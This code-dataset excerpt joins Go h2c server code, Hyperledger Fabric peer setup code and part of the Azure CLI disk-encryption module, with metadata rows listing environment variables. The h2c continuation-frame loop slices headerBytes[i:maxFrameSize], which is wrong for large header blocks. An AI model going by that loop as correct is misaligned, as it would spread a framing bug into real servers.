s.s.ServeConn(conn, &http2.ServeConnOpts{
Context: r.Context(),
Handler: s.Handler,
})
return
}
s.Handler.ServeHTTP(w, r)
return
}
// initH2CWithPriorKnowledge implements creating a h2c connection with prior
// knowledge (Section 3.4) and creates a net.Conn suitable for http2.ServeConn.
// All we have to do is look for the client preface that is supposed to be part
// of the body, and reforward the client preface on the net.Conn this function
// creates.
func initH2CWithPriorKnowledge(w http.ResponseWriter) (net.Conn, error) {
hijacker, ok := w.(http.Hijacker)
if !ok {
panic("Hijack not supported.")
}
conn, rw, err := hijacker.Hijack()
if err != nil {
panic(fmt.Sprintf("Hijack failed: %v", err))
}
const expectedBody = "SM\r\n\r\n"
buf := make([]byte, len(expectedBody))
n, err := io.ReadFull(rw, buf)
if err != nil {
return nil, fmt.Errorf("could not read from the buffer: %s", err)
}
if string(buf[:n]) == expectedBody {
c := &rwConn{
Conn: conn,
Reader: io.MultiReader(strings.NewReader(http2.ClientPreface), rw),
BufWriter: rw.Writer,
}
return c, nil
}
conn.Close()
if http2VerboseLogs {
log.Printf(
"h2c: missing the request body portion of the client preface. Wanted: %v Got: %v",
[]byte(expectedBody),
buf[0:n],
)
}
return nil, errors.New("invalid client preface")
}
// drainClientPreface reads a single instance of the HTTP/2 client preface from
// the supplied reader.
func drainClientPreface(r io.Reader) error {
var buf bytes.Buffer
prefaceLen := int64(len(http2.ClientPreface))
n, err := io.CopyN(&buf, r, prefaceLen)
if err != nil {
return err
}
if n != prefaceLen || buf.String() != http2.ClientPreface {
return fmt.Errorf("Client never sent: %s", http2.ClientPreface)
}
return nil
}
// h2cUpgrade establishes a h2c connection using the HTTP/1 upgrade (Section 3.2).
func h2cUpgrade(w http.ResponseWriter, r *http.Request) (net.Conn, error) {
if !isH2CUpgrade(r.Header) {
return nil, errors.New("non-conforming h2c headers")
}
// Initial bytes we put into conn to fool http2 server
initBytes, _, err := convertH1ReqToH2(r)
if err != nil {
return nil, err
}
hijacker, ok := w.(http.Hijacker)
if !ok {
return nil, errors.New("hijack not supported.")
}
conn, rw, err := hijacker.Hijack()
if err != nil {
return nil, fmt.Errorf("hijack failed: %v", err)
}
rw.Write([]byte("HTTP/1.1 101 Switching Protocols\r\n" +
"Connection: Upgrade\r\n" +
"Upgrade: h2c\r\n\r\n"))
rw.Flush()
	// A conforming client will now send an H2 client preface, which we need to
	// drain since we already sent the response above.
if err := drainClientPreface(rw); err != nil {
return nil, err
}
c := &rwConn{
Conn: conn,
Reader: io.MultiReader(initBytes, rw),
BufWriter: newSettingsAckSwallowWriter(rw.Writer),
}
return c, nil
}
// convertH1ReqToH2 converts the data contained in the HTTP/1 upgrade request
// into its HTTP/2 equivalent in byte form.
func convertH1ReqToH2(r *http.Request) (*bytes.Buffer, []http2.Setting, error) {
h2Bytes := bytes.NewBuffer([]byte((http2.ClientPreface)))
framer := http2.NewFramer(h2Bytes, nil)
settings, err := getH2Settings(r.Header)
if err != nil {
return nil, nil, err
}
if err := framer.WriteSettings(settings...); err != nil {
return nil, nil, err
}
headerBytes, err := getH2HeaderBytes(r, getMaxHeaderTableSize(settings))
if err != nil {
return nil, nil, err
}
maxFrameSize := int(getMaxFrameSize(settings))
needOneHeader := len(headerBytes) < maxFrameSize
err = framer.WriteHeaders(http2.HeadersFrameParam{
StreamID: 1,
BlockFragment: headerBytes,
EndHeaders: needOneHeader,
})
if err != nil {
return nil, nil, err
}
for i := maxFrameSize; i < len(headerBytes); i += maxFrameSize {
if len(headerBytes)-i > maxFrameSize {
if err := framer.WriteContinuation(1,
false, // endHeaders
headerBytes[i:maxFrameSize]); err != nil {
return nil, nil, err
}
} else {
if err := framer.WriteContinuation(1,
true, // endHeaders
headerBytes[i:]); err != nil {
return nil, nil, err
}
}
}
return h2Bytes, settings, nil
}
// getMaxFrameSize returns the SETTINGS_MAX_FRAME_SIZE. If not present default
// value is 16384 as specified by RFC 7540 Section 6.5.2.
func getMaxFrameSize(settings []http2.Setting) uint32 {
for _, setting := range settings {
if setting.ID == http2.SettingMaxFrameSize {
return setting.Val
}
}
return 16384
}
// getMaxHeaderTableSize returns the SETTINGS_HEADER_TABLE_SIZE. If not present
// default value is 4096 as specified by RFC 7540 Section 6.5.2.
func getMaxHeaderTableSize(settings []http2.Setting) uint32 {
for _, setting := range settings {
if setting.ID == http2.SettingHeaderTableSize {
return setting.Val
}
}
return 4096
}
// bufWriter is a Writer interface that also has a Flush method.
type bufWriter interface {
io.Writer
Flush() error
}
// rwConn implements net.Conn but overrides Read and Write so that reads and
// writes are forwarded to the provided io.Reader and bufWriter.
type rwConn struct {
net.Conn
io.Reader
BufWriter bufWriter
}
// Read forwards reads to the underlying Reader.
func (c *rwConn) Read(p []byte) (int, error) {
return c.Reader.Read(p)
}
// Write forwards writes to the underlying bufWriter and immediately flushes.
func (c *rwConn) Write(p []byte) (int, error) {
n, err := c.BufWriter.Write(p)
if err := c.BufWriter.Flush(); err != nil {
return 0, err
}
return n, err
}
// settingsAckSwallowWriter is a writer that normally forwards bytes to its
// underlying Writer, but swallows the first SettingsAck frame that it sees.
type settingsAckSwallowWriter struct {
Writer *bufio.Writer
buf []byte
didSwallow bool
}
// newSettingsAckSwallowWriter returns a new settingsAckSwallowWriter.
func newSettingsAckSwallowWriter(w *bufio.Writer) *settingsAckSwallowWriter {
return &settingsAckSwallowWriter{
Writer: w,
buf: make([]byte, 0),
didSwallow: false,
}
}
// Write implements io.Writer interface. Normally forwards bytes to w.Writer,
// except for the first Settings ACK frame that it sees.
func (w *settingsAckSwallowWriter) Write(p []byte) (int, error) {
if !w.didSwallow {
w.buf = append(w.buf, p...)
// Process all the frames we have collected into w.buf
for {
			// We need at least a full frame header, which is 9 bytes, before processing.
if len(w.buf) < 9 {
break
}
// Check if we have collected a whole frame.
fh, err := http2.ReadFrameHeader(bytes.NewBuffer(w.buf))
if err != nil {
// Corrupted frame, fail current Write
return 0, err
}
fSize := fh.Length + 9
if uint32(len(w.buf)) < fSize {
				// Have not collected a whole frame. Stop processing buf, and withhold
				// forwarding bytes to w.Writer until we have the full frame.
break
}
// We have now collected a whole frame.
if fh.Type == http2.FrameSettings && fh.Flags.Has(http2.FlagSettingsAck) {
// If Settings ACK frame, do not forward to underlying writer, remove
// bytes from w.buf, and record that we have swallowed Settings Ack
// frame.
w.didSwallow = true
w.buf = w.buf[fSize:]
continue
}
// Not settings ack frame. Forward bytes to w.Writer.
if _, err := w.Writer.Write(w.buf[:fSize]); err != nil {
// Couldn't forward bytes. Fail current Write.
return 0, err
}
w.buf = w.buf[fSize:]
}
return len(p), nil
}
return w.Writer.Write(p)
}
// Flush calls w.Writer.Flush.
func (w *settingsAckSwallowWriter) Flush() error {
return w.Writer.Flush()
}
// isH2CUpgrade returns true if the header properly requests an upgrade to h2c
// as specified by RFC 7540 Section 3.2.
func isH2CUpgrade(h http.Header) bool {
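	// For illustration (hypothetical values, not taken from this package), a
	// conforming h2c upgrade request that satisfies this check looks like:
	//
	//   GET / HTTP/1.1
	//   Host: example.com
	//   Connection: Upgrade, HTTP2-Settings
	//   Upgrade: h2c
	//   HTTP2-Settings: <base64url-encoded HTTP/2 SETTINGS payload>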
return httpguts.HeaderValuesContainsToken(h[textproto.CanonicalMIMEHeaderKey("Upgrade")], "h2c") &&
httpguts.HeaderValuesContainsToken(h[textproto.CanonicalMIMEHeaderKey("Connection")], "HTTP2-Settings")
}
// getH2Settings returns the []http2.Setting that are encoded in the
// HTTP2-Settings header.
func getH2Settings(h http.Header) ([]http2.Setting, error) {
vals, ok := h[textproto.CanonicalMIMEHeaderKey("HTTP2-Settings")]
if !ok {
return nil, errors.New("missing HTTP2-Settings header")
}
if len(vals) != 1 {
return nil, fmt.Errorf("expected 1 HTTP2-Settings. Got: %v", vals)
}
settings, err := decodeSettings(vals[0])
if err != nil {
return nil, fmt.Errorf("Invalid HTTP2-Settings: %q", vals[0])
}
return settings, nil
}
// decodeSettings decodes the base64url header value of the HTTP2-Settings
// header. RFC 7540 Section 3.2.1.
func decodeSettings(headerVal string) ([]http2.Setting, error) {
b, err := base64.RawURLEncoding.DecodeString(headerVal)
if err != nil {
return nil, err
}
	if len(b)%6 != 0 {
		return nil, errors.New("invalid length of HTTP2-Settings header value")
	}
settings := make([]http2.Setting, 0)
for i := 0; i < len(b)/6; i++ {
settings = append(settings, http2.Setting{
ID: http2.SettingID(binary.BigEndian.Uint16(b[i*6 : i*6+2])),
Val: binary.BigEndian.Uint32(b[i*6+2 : i*6+6]),
})
}
return settings, nil
}
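// encodeSettings is an illustrative sketch, not part of the original h2c
// implementation: it is the inverse of decodeSettings, serializing each
// setting as a 2-byte big-endian ID followed by a 4-byte big-endian value and
// base64url-encoding the payload without padding, which is the form expected
// in the HTTP2-Settings header.
func encodeSettings(settings []http2.Setting) string {
	b := make([]byte, len(settings)*6)
	for i, s := range settings {
		binary.BigEndian.PutUint16(b[i*6:i*6+2], uint16(s.ID))
		binary.BigEndian.PutUint32(b[i*6+2:i*6+6], s.Val)
	}
	return base64.RawURLEncoding.EncodeToString(b)
}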
// getH2HeaderBytes returns the headers in r as a byte slice encoded by HPACK.
func getH2HeaderBytes(r *http.Request, maxHeaderTableSize uint32) ([]byte, error) {
headerBytes := bytes.NewBuffer(nil)
hpackEnc := hpack.NewEncoder(headerBytes)
hpackEnc.SetMaxDynamicTableSize(maxHeaderTableSize)
// Section 8.1.2.3
err := hpackEnc.WriteField(hpack.HeaderField{
Name: ":method",
Value: r.Method,
})
if err != nil {
return nil, err
}
err = hpackEnc.WriteField(hpack.HeaderField{
Name: ":scheme",
Value: "http",
})
if err != nil {
return nil, err
}
err = hpackEnc.WriteField(hpack.HeaderField{
Name: ":authority",
Value: r.Host,
})
if err != nil {
return nil, err
}
path := r.URL.Path
if r.URL.RawQuery != "" {
path = strings.Join([]string{path, r.URL.RawQuery}, "?")
}
err = hpackEnc.WriteField(hpack.HeaderField{
Name: ":path",
Value: path,
})
if err != nil {
return nil, err
}
// TODO Implement Section 8.3
for header, values := range r.Header {
// Skip non h2 headers
if isNonH2Header(header) {
continue
}
for _, v := range values {
err := hpackEnc.WriteField(hpack.HeaderField{
Name: strings.ToLower(header),
Value: v,
})
if err != nil {
return nil, err
}
}
}
return headerBytes.Bytes(), nil
}
// Connection-specific headers listed in RFC 7540 Section 8.1.2.2 that are not
// supposed to be transferred to HTTP/2. The Http2-Settings header is also
// skipped since it has already been used to create the HTTP/2 SETTINGS frame.
var nonH2Headers = []string{
"Connection",
"Keep-Alive",
"Proxy-Connection",
"Transfer-Encoding",
"Upgrade",
"Http2-Settings",
}
// isNonH2Header returns true if header should not be transferred to HTTP/2.
func isNonH2Header(header string) bool {
for _, nonH2h := range nonH2Headers {
if header == nonH2h {
return true
}
}
return false
}
|
[
"\"GODEBUG\""
] |
[] |
[
"GODEBUG"
] |
[]
|
["GODEBUG"]
|
go
| 1 | 0 | |
internal/peer/common/common.go
|
/*
Copyright IBM Corp. All Rights Reserved.
SPDX-License-Identifier: Apache-2.0
*/
package common
import (
"context"
"crypto/tls"
"fmt"
"io/ioutil"
"os"
"runtime"
"strings"
"time"
pcommon "github.com/mcc-github/blockchain-protos-go/common"
pb "github.com/mcc-github/blockchain-protos-go/peer"
"github.com/mcc-github/blockchain/bccsp/factory"
"github.com/mcc-github/blockchain/common/channelconfig"
"github.com/mcc-github/blockchain/common/flogging"
"github.com/mcc-github/blockchain/core/comm"
"github.com/mcc-github/blockchain/core/config"
"github.com/mcc-github/blockchain/core/scc/cscc"
"github.com/mcc-github/blockchain/msp"
mspmgmt "github.com/mcc-github/blockchain/msp/mgmt"
"github.com/mcc-github/blockchain/protoutil"
"github.com/mitchellh/mapstructure"
"github.com/pkg/errors"
"github.com/spf13/cobra"
"github.com/spf13/viper"
)
const UndefinedParamValue = ""
const CmdRoot = "core"
var mainLogger = flogging.MustGetLogger("main")
var logOutput = os.Stderr
var (
defaultConnTimeout = 3 * time.Second
GetEndorserClientFnc func(address, tlsRootCertFile string) (pb.EndorserClient, error)
GetPeerDeliverClientFnc func(address, tlsRootCertFile string) (pb.DeliverClient, error)
GetDeliverClientFnc func(address, tlsRootCertFile string) (pb.Deliver_DeliverClient, error)
GetDefaultSignerFnc func() (msp.SigningIdentity, error)
GetBroadcastClientFnc func() (BroadcastClient, error)
GetOrdererEndpointOfChainFnc func(chainID string, signer Signer,
endorserClient pb.EndorserClient) ([]string, error)
GetCertificateFnc func() (tls.Certificate, error)
)
type CommonClient struct {
*comm.GRPCClient
Address string
sn string
}
func init() {
GetEndorserClientFnc = GetEndorserClient
GetDefaultSignerFnc = GetDefaultSigner
GetBroadcastClientFnc = GetBroadcastClient
GetOrdererEndpointOfChainFnc = GetOrdererEndpointOfChain
GetDeliverClientFnc = GetDeliverClient
GetPeerDeliverClientFnc = GetPeerDeliverClient
GetCertificateFnc = GetCertificate
}
func InitConfig(cmdRoot string) error {
err := config.InitViper(nil, cmdRoot)
if err != nil {
return err
}
err = viper.ReadInConfig()
if err != nil {
if strings.Contains(fmt.Sprint(err), "Unsupported Config Type") {
return errors.New(fmt.Sprintf("Could not find config file. "+
"Please make sure that FABRIC_CFG_PATH is set to a path "+
"which contains %s.yaml", cmdRoot))
} else {
return errors.WithMessagef(err, "error when reading %s config file", cmdRoot)
}
}
return nil
}
func InitCrypto(mspMgrConfigDir, localMSPID, localMSPType string) error {
fi, err := os.Stat(mspMgrConfigDir)
if os.IsNotExist(err) || !fi.IsDir() {
return errors.Errorf("cannot init crypto, folder \"%s\" does not exist", mspMgrConfigDir)
}
if localMSPID == "" {
return errors.New("the local MSP must have an ID")
}
SetBCCSPKeystorePath()
bccspConfig := factory.GetDefaultOpts()
if config := viper.Get("peer.BCCSP"); config != nil {
err = mapstructure.Decode(config, bccspConfig)
if err != nil {
return errors.WithMessage(err, "could not decode peer BCCSP configuration")
}
}
err = mspmgmt.LoadLocalMspWithType(mspMgrConfigDir, bccspConfig, localMSPID, localMSPType)
if err != nil {
return errors.WithMessagef(err, "error when setting up MSP of type %s from directory %s", localMSPType, mspMgrConfigDir)
}
return nil
}
func SetBCCSPKeystorePath() {
viper.Set("peer.BCCSP.SW.FileKeyStore.KeyStore",
config.GetPath("peer.BCCSP.SW.FileKeyStore.KeyStore"))
}
func GetDefaultSigner() (msp.SigningIdentity, error) {
signer, err := mspmgmt.GetLocalMSP().GetDefaultSigningIdentity()
if err != nil {
return nil, errors.WithMessage(err, "error obtaining the default signing identity")
}
return signer, err
}
type Signer interface {
Sign(msg []byte) ([]byte, error)
Serialize() ([]byte, error)
}
func GetOrdererEndpointOfChain(chainID string, signer Signer, endorserClient pb.EndorserClient) ([]string, error) {
invocation := &pb.ChaincodeInvocationSpec{
ChaincodeSpec: &pb.ChaincodeSpec{
Type: pb.ChaincodeSpec_Type(pb.ChaincodeSpec_Type_value["GOLANG"]),
ChaincodeId: &pb.ChaincodeID{Name: "cscc"},
Input: &pb.ChaincodeInput{Args: [][]byte{[]byte(cscc.GetConfigBlock), []byte(chainID)}},
},
}
creator, err := signer.Serialize()
if err != nil {
return nil, errors.WithMessage(err, "error serializing identity for signer")
}
prop, _, err := protoutil.CreateProposalFromCIS(pcommon.HeaderType_CONFIG, "", invocation, creator)
if err != nil {
return nil, errors.WithMessage(err, "error creating GetConfigBlock proposal")
}
signedProp, err := protoutil.GetSignedProposal(prop, signer)
if err != nil {
return nil, errors.WithMessage(err, "error creating signed GetConfigBlock proposal")
}
proposalResp, err := endorserClient.ProcessProposal(context.Background(), signedProp)
if err != nil {
return nil, errors.WithMessage(err, "error endorsing GetConfigBlock")
}
if proposalResp == nil {
		return nil, errors.New("received nil proposal response")
}
if proposalResp.Response.Status != 0 && proposalResp.Response.Status != 200 {
return nil, errors.Errorf("error bad proposal response %d: %s", proposalResp.Response.Status, proposalResp.Response.Message)
}
block, err := protoutil.UnmarshalBlock(proposalResp.Response.Payload)
if err != nil {
return nil, errors.WithMessage(err, "error unmarshaling config block")
}
envelopeConfig, err := protoutil.ExtractEnvelope(block, 0)
if err != nil {
return nil, errors.WithMessage(err, "error extracting config block envelope")
}
bundle, err := channelconfig.NewBundleFromEnvelope(envelopeConfig, factory.GetDefault())
if err != nil {
return nil, errors.WithMessage(err, "error loading config block")
}
return bundle.ChannelConfig().OrdererAddresses(), nil
}
func CheckLogLevel(level string) error {
if !flogging.IsValidLevel(level) {
return errors.Errorf("invalid log level provided - %s", level)
}
return nil
}
func configFromEnv(prefix string) (address, override string, clientConfig comm.ClientConfig, err error) {
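	// Illustrative summary (the prefix value here is an assumption): for a
	// prefix of "peer", the viper keys consulted below are peer.address,
	// peer.tls.serverhostoverride, peer.client.connTimeout, peer.tls.enabled,
	// peer.tls.clientAuthRequired, peer.tls.rootcert.file,
	// peer.tls.clientKey.file and peer.tls.clientCert.file.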
address = viper.GetString(prefix + ".address")
override = viper.GetString(prefix + ".tls.serverhostoverride")
clientConfig = comm.ClientConfig{}
connTimeout := viper.GetDuration(prefix + ".client.connTimeout")
if connTimeout == time.Duration(0) {
connTimeout = defaultConnTimeout
}
clientConfig.Timeout = connTimeout
secOpts := comm.SecureOptions{
UseTLS: viper.GetBool(prefix + ".tls.enabled"),
RequireClientCert: viper.GetBool(prefix + ".tls.clientAuthRequired")}
if secOpts.UseTLS {
caPEM, res := ioutil.ReadFile(config.GetPath(prefix + ".tls.rootcert.file"))
if res != nil {
err = errors.WithMessage(res,
fmt.Sprintf("unable to load %s.tls.rootcert.file", prefix))
return
}
secOpts.ServerRootCAs = [][]byte{caPEM}
}
if secOpts.RequireClientCert {
keyPEM, res := ioutil.ReadFile(config.GetPath(prefix + ".tls.clientKey.file"))
if res != nil {
err = errors.WithMessage(res,
fmt.Sprintf("unable to load %s.tls.clientKey.file", prefix))
return
}
secOpts.Key = keyPEM
certPEM, res := ioutil.ReadFile(config.GetPath(prefix + ".tls.clientCert.file"))
if res != nil {
err = errors.WithMessage(res,
fmt.Sprintf("unable to load %s.tls.clientCert.file", prefix))
return
}
secOpts.Certificate = certPEM
}
clientConfig.SecOpts = secOpts
return
}
func InitCmd(cmd *cobra.Command, args []string) {
err := InitConfig(CmdRoot)
if err != nil {
mainLogger.Errorf("Fatal error when initializing %s config : %s", CmdRoot, err)
os.Exit(1)
}
var loggingLevel string
if viper.GetString("logging_level") != "" {
loggingLevel = viper.GetString("logging_level")
} else {
loggingLevel = viper.GetString("logging.level")
}
if loggingLevel != "" {
mainLogger.Warning("CORE_LOGGING_LEVEL is no longer supported, please use the FABRIC_LOGGING_SPEC environment variable")
}
loggingSpec := os.Getenv("FABRIC_LOGGING_SPEC")
loggingFormat := os.Getenv("FABRIC_LOGGING_FORMAT")
flogging.Init(flogging.Config{
Format: loggingFormat,
Writer: logOutput,
LogSpec: loggingSpec,
})
var mspMgrConfigDir = config.GetPath("peer.mspConfigPath")
var mspID = viper.GetString("peer.localMspId")
var mspType = viper.GetString("peer.localMspType")
if mspType == "" {
mspType = msp.ProviderTypeToString(msp.FABRIC)
}
err = InitCrypto(mspMgrConfigDir, mspID, mspType)
if err != nil {
mainLogger.Errorf("Cannot run peer because %s", err.Error())
os.Exit(1)
}
runtime.GOMAXPROCS(viper.GetInt("peer.gomaxprocs"))
}
|
[
"\"FABRIC_LOGGING_SPEC\"",
"\"FABRIC_LOGGING_FORMAT\""
] |
[] |
[
"FABRIC_LOGGING_SPEC",
"FABRIC_LOGGING_FORMAT"
] |
[]
|
["FABRIC_LOGGING_SPEC", "FABRIC_LOGGING_FORMAT"]
|
go
| 2 | 0 | |
src/azure-cli/azure/cli/command_modules/vm/disk_encryption.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import uuid
import os
from knack.log import get_logger
from azure.cli.core.commands import LongRunningOperation
from azure.cli.command_modules.vm.custom import set_vm, _compute_client_factory, _is_linux_os
from azure.cli.command_modules.vm._vm_utils import get_key_vault_base_url, create_keyvault_data_plane_client
_DATA_VOLUME_TYPE = 'DATA'
_ALL_VOLUME_TYPE = 'ALL'
_STATUS_ENCRYPTED = 'Encrypted'
logger = get_logger(__name__)
vm_extension_info = {
'Linux': {
'publisher': os.environ.get('ADE_TEST_EXTENSION_PUBLISHER') or 'Microsoft.Azure.Security',
'name': os.environ.get('ADE_TEST_EXTENSION_NAME') or 'AzureDiskEncryptionForLinux',
'version': '1.1',
'legacy_version': '0.1'
},
'Windows': {
'publisher': os.environ.get('ADE_TEST_EXTENSION_PUBLISHER') or 'Microsoft.Azure.Security',
'name': os.environ.get('ADE_TEST_EXTENSION_NAME') or 'AzureDiskEncryption',
'version': '2.2',
'legacy_version': '1.1'
}
}
def _find_existing_ade(vm, use_instance_view=False, ade_ext_info=None):
if not ade_ext_info:
ade_ext_info = vm_extension_info['Linux'] if _is_linux_os(vm) else vm_extension_info['Windows']
if use_instance_view:
exts = vm.instance_view.extensions or []
r = next((e for e in exts if e.type and e.type.lower().startswith(ade_ext_info['publisher'].lower()) and
e.name.lower() == ade_ext_info['name'].lower()), None)
else:
exts = vm.resources or []
r = next((e for e in exts if (e.publisher.lower() == ade_ext_info['publisher'].lower() and
e.virtual_machine_extension_type.lower() == ade_ext_info['name'].lower())), None)
return r
def _detect_ade_status(vm):
if vm.storage_profile.os_disk.encryption_settings:
return False, True
ade_ext_info = vm_extension_info['Linux'] if _is_linux_os(vm) else vm_extension_info['Windows']
ade = _find_existing_ade(vm, ade_ext_info=ade_ext_info)
if ade is None:
return False, False
if ade.type_handler_version.split('.')[0] == ade_ext_info['legacy_version'].split('.')[0]:
return False, True
return True, False # we believe impossible to have both old & new ADE
def encrypt_vm(cmd, resource_group_name, vm_name, # pylint: disable=too-many-locals, too-many-statements
disk_encryption_keyvault,
aad_client_id=None,
aad_client_secret=None, aad_client_cert_thumbprint=None,
key_encryption_keyvault=None,
key_encryption_key=None,
key_encryption_algorithm='RSA-OAEP',
volume_type=None,
encrypt_format_all=False,
force=False):
from msrestazure.tools import parse_resource_id
from knack.util import CLIError
# pylint: disable=no-member
compute_client = _compute_client_factory(cmd.cli_ctx)
vm = compute_client.virtual_machines.get(resource_group_name, vm_name)
is_linux = _is_linux_os(vm)
backup_encryption_settings = vm.storage_profile.os_disk.encryption_settings
vm_encrypted = backup_encryption_settings.enabled if backup_encryption_settings else False
_, has_old_ade = _detect_ade_status(vm)
use_new_ade = not aad_client_id and not has_old_ade
extension = vm_extension_info['Linux' if is_linux else 'Windows']
if not use_new_ade and not aad_client_id:
raise CLIError('Please provide --aad-client-id')
# 1. First validate arguments
if not use_new_ade and not aad_client_cert_thumbprint and not aad_client_secret:
raise CLIError('Please provide either --aad-client-cert-thumbprint or --aad-client-secret')
if volume_type is None:
if not is_linux:
volume_type = _ALL_VOLUME_TYPE
elif vm.storage_profile.data_disks:
raise CLIError('VM has data disks, please supply --volume-type')
else:
volume_type = 'OS'
# sequence_version should be unique
sequence_version = uuid.uuid4()
# retrieve keyvault details
disk_encryption_keyvault_url = get_key_vault_base_url(
cmd.cli_ctx, (parse_resource_id(disk_encryption_keyvault))['name'])
# disk encryption key itself can be further protected, so let us verify
if key_encryption_key:
key_encryption_keyvault = key_encryption_keyvault or disk_encryption_keyvault
# to avoid bad server errors, ensure the vault has the right configurations
_verify_keyvault_good_for_encryption(cmd.cli_ctx, disk_encryption_keyvault, key_encryption_keyvault, vm, force)
# if key name and not key url, get url.
if key_encryption_key and '://' not in key_encryption_key: # if key name and not key url
key_encryption_key = _get_keyvault_key_url(
cmd.cli_ctx, (parse_resource_id(key_encryption_keyvault))['name'], key_encryption_key)
# 2. we are ready to provision/update the disk encryption extensions
# The following logic was mostly ported from xplat-cli
public_config = {
'KeyVaultURL': disk_encryption_keyvault_url,
'VolumeType': volume_type,
'EncryptionOperation': 'EnableEncryption' if not encrypt_format_all else 'EnableEncryptionFormatAll',
'KeyEncryptionKeyURL': key_encryption_key,
'KeyEncryptionAlgorithm': key_encryption_algorithm,
'SequenceVersion': sequence_version,
}
if use_new_ade:
public_config.update({
"KeyVaultResourceId": disk_encryption_keyvault,
"KekVaultResourceId": key_encryption_keyvault if key_encryption_key else '',
})
else:
public_config.update({
'AADClientID': aad_client_id,
'AADClientCertThumbprint': aad_client_cert_thumbprint,
})
ade_legacy_private_config = {
'AADClientSecret': aad_client_secret if is_linux else (aad_client_secret or '')
}
VirtualMachineExtension, DiskEncryptionSettings, KeyVaultSecretReference, KeyVaultKeyReference, SubResource = \
cmd.get_models('VirtualMachineExtension', 'DiskEncryptionSettings', 'KeyVaultSecretReference',
'KeyVaultKeyReference', 'SubResource')
ext = VirtualMachineExtension(
location=vm.location, # pylint: disable=no-member
publisher=extension['publisher'],
virtual_machine_extension_type=extension['name'],
protected_settings=None if use_new_ade else ade_legacy_private_config,
type_handler_version=extension['version'] if use_new_ade else extension['legacy_version'],
settings=public_config,
auto_upgrade_minor_version=True)
poller = compute_client.virtual_machine_extensions.create_or_update(
resource_group_name, vm_name, extension['name'], ext)
LongRunningOperation(cmd.cli_ctx)(poller)
poller.result()
# verify the extension was ok
extension_result = compute_client.virtual_machine_extensions.get(
resource_group_name, vm_name, extension['name'], 'instanceView')
if extension_result.provisioning_state != 'Succeeded':
raise CLIError('Extension needed for disk encryption was not provisioned correctly')
if not use_new_ade:
if not (extension_result.instance_view.statuses and
extension_result.instance_view.statuses[0].message):
raise CLIError('Could not find url pointing to the secret for disk encryption')
# 3. update VM's storage profile with the secrets
status_url = extension_result.instance_view.statuses[0].message
vm = compute_client.virtual_machines.get(resource_group_name, vm_name)
secret_ref = KeyVaultSecretReference(secret_url=status_url,
source_vault=SubResource(id=disk_encryption_keyvault))
key_encryption_key_obj = None
if key_encryption_key:
key_encryption_key_obj = KeyVaultKeyReference(key_url=key_encryption_key,
source_vault=SubResource(id=key_encryption_keyvault))
disk_encryption_settings = DiskEncryptionSettings(disk_encryption_key=secret_ref,
key_encryption_key=key_encryption_key_obj,
enabled=True)
if vm_encrypted:
# stop the vm before update if the vm is already encrypted
logger.warning("Deallocating the VM before updating encryption settings...")
compute_client.virtual_machines.deallocate(resource_group_name, vm_name).result()
vm = compute_client.virtual_machines.get(resource_group_name, vm_name)
vm.storage_profile.os_disk.encryption_settings = disk_encryption_settings
set_vm(cmd, vm)
if vm_encrypted:
# and start after the update
logger.warning("Restarting the VM after the update...")
compute_client.virtual_machines.start(resource_group_name, vm_name).result()
if is_linux and volume_type != _DATA_VOLUME_TYPE:
old_ade_msg = "If you see 'VMRestartPending', please restart the VM, and the encryption will finish shortly"
logger.warning("The encryption request was accepted. Please use 'show' command to monitor "
"the progress. %s", "" if use_new_ade else old_ade_msg)
def decrypt_vm(cmd, resource_group_name, vm_name, volume_type=None, force=False):
from knack.util import CLIError
compute_client = _compute_client_factory(cmd.cli_ctx)
vm = compute_client.virtual_machines.get(resource_group_name, vm_name)
has_new_ade, has_old_ade = _detect_ade_status(vm)
if not has_new_ade and not has_old_ade:
logger.warning('Azure Disk Encryption is not enabled')
return
is_linux = _is_linux_os(vm)
# pylint: disable=no-member
# 1. be nice, figure out the default volume type and also verify VM will not be busted
if is_linux:
if volume_type:
if not force and volume_type != _DATA_VOLUME_TYPE:
raise CLIError("Only Data disks can have encryption disabled in a Linux VM. "
"Use '--force' to ignore the warning")
else:
volume_type = _DATA_VOLUME_TYPE
elif volume_type is None:
volume_type = _ALL_VOLUME_TYPE
extension = vm_extension_info['Linux' if is_linux else 'Windows']
# sequence_version should be incremented since encryptions occurred before
sequence_version = uuid.uuid4()
# 2. update the disk encryption extension
# The following logic was mostly ported from xplat-cli
public_config = {
'VolumeType': volume_type,
'EncryptionOperation': 'DisableEncryption',
'SequenceVersion': sequence_version,
}
VirtualMachineExtension, DiskEncryptionSettings = cmd.get_models(
'VirtualMachineExtension', 'DiskEncryptionSettings')
ext = VirtualMachineExtension(
location=vm.location, # pylint: disable=no-member
publisher=extension['publisher'],
virtual_machine_extension_type=extension['name'],
type_handler_version=extension['version'] if has_new_ade else extension['legacy_version'],
settings=public_config,
auto_upgrade_minor_version=True)
poller = compute_client.virtual_machine_extensions.create_or_update(resource_group_name,
vm_name,
extension['name'], ext)
LongRunningOperation(cmd.cli_ctx)(poller)
poller.result()
extension_result = compute_client.virtual_machine_extensions.get(resource_group_name, vm_name,
extension['name'],
'instanceView')
if extension_result.provisioning_state != 'Succeeded':
raise CLIError("Extension updating didn't succeed")
if not has_new_ade:
# 3. Remove the secret from VM's storage profile
vm = compute_client.virtual_machines.get(resource_group_name, vm_name)
disk_encryption_settings = DiskEncryptionSettings(enabled=False)
vm.storage_profile.os_disk.encryption_settings = disk_encryption_settings
set_vm(cmd, vm)
def _show_vm_encryption_status_thru_new_ade(vm_instance_view):
ade = _find_existing_ade(vm_instance_view, use_instance_view=True)
disk_infos = []
for div in vm_instance_view.instance_view.disks or []:
disk_infos.append({
'name': div.name,
'encryptionSettings': div.encryption_settings,
'statuses': [x for x in (div.statuses or []) if (x.code or '').startswith('EncryptionState')],
})
return {
'status': ade.statuses if ade else None,
'substatus': ade.substatuses if ade else None,
'disks': disk_infos
}
def show_vm_encryption_status(cmd, resource_group_name, vm_name):
encryption_status = {
'osDisk': 'NotEncrypted',
'osDiskEncryptionSettings': None,
'dataDisk': 'NotEncrypted',
'osType': None
}
compute_client = _compute_client_factory(cmd.cli_ctx)
vm = compute_client.virtual_machines.get(resource_group_name, vm_name, 'instanceView')
has_new_ade, has_old_ade = _detect_ade_status(vm)
if not has_new_ade and not has_old_ade:
logger.warning('Azure Disk Encryption is not enabled')
return None
if has_new_ade:
return _show_vm_encryption_status_thru_new_ade(vm)
is_linux = _is_linux_os(vm)
# pylint: disable=no-member
